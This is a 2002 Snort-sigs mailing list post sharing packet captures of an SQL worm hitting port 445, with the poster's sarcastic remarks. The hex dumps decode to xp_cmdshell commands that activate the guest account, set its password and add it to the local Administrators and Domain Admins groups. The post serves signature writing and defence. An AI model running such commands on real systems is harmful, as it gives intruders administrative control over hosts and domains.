[Snort-sigs] SQL Worm port 445 traces

Robert Wagner rwagner at ...447...
Tue May 21 15:30:02 EDT 2002


Here is some more information about traffic coming accross 445.  This is
just some of the packets that came accross:


0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 2F 00 61 00 63 00 74 00 69 00 76 00  t. ./.a.c.t.i.v.
0x00D0: 65 00 3A 00 79 00 65 00 73 00 27 00              e.:.y.e.s.'.

---> Nice of it to reactive my deactive guest account for me

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 6F 00 34 00 63 00 33 00 65 00 33 00  t. .o.4.c.3.e.3.
0x00D0: 63 00 39 00 27 00                                c.9.'.

--> I am not sure when the password was changed to this. 

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 6C 00  l. .'.n.e.t. .l.
0x00B0: 6F 00 63 00 61 00 6C 00 67 00 72 00 6F 00 75 00  o.c.a.l.g.r.o.u.
0x00C0: 70 00 20 00 61 00 64 00 6D 00 69 00 6E 00 69 00  p. .a.d.m.i.n.i.
0x00D0: 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 73 00  s.t.r.a.t.o.r.s.
0x00E0: 20 00 67 00 75 00 65 00 73 00 74 00 20 00 2F 00   .g.u.e.s.t. ./.
0x00F0: 61 00 64 00 64 00 27 00                          a.d.d.'.

-->  Cool! now that guest is part of Administrators I can forget my admin
account id and password.

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 67 00  l. .'.n.e.t. .g.
0x00B0: 72 00 6F 00 75 00 70 00 20 00 22 00 44 00 6F 00  r.o.u.p. .".D.o.
0x00C0: 6D 00 61 00 69 00 6E 00 20 00 41 00 64 00 6D 00  m.a.i.n. .A.d.m.
0x00D0: 69 00 6E 00 73 00 22 00 20 00 67 00 75 00 65 00  i.n.s.". .g.u.e.
0x00E0: 73 00 74 00 20 00 2F 00 61 00 64 00 64 00 27 00  s.t. ./.a.d.d.'.

--> Now guest is part of the Domain Admins!




More information about the Snort-sigs mailing list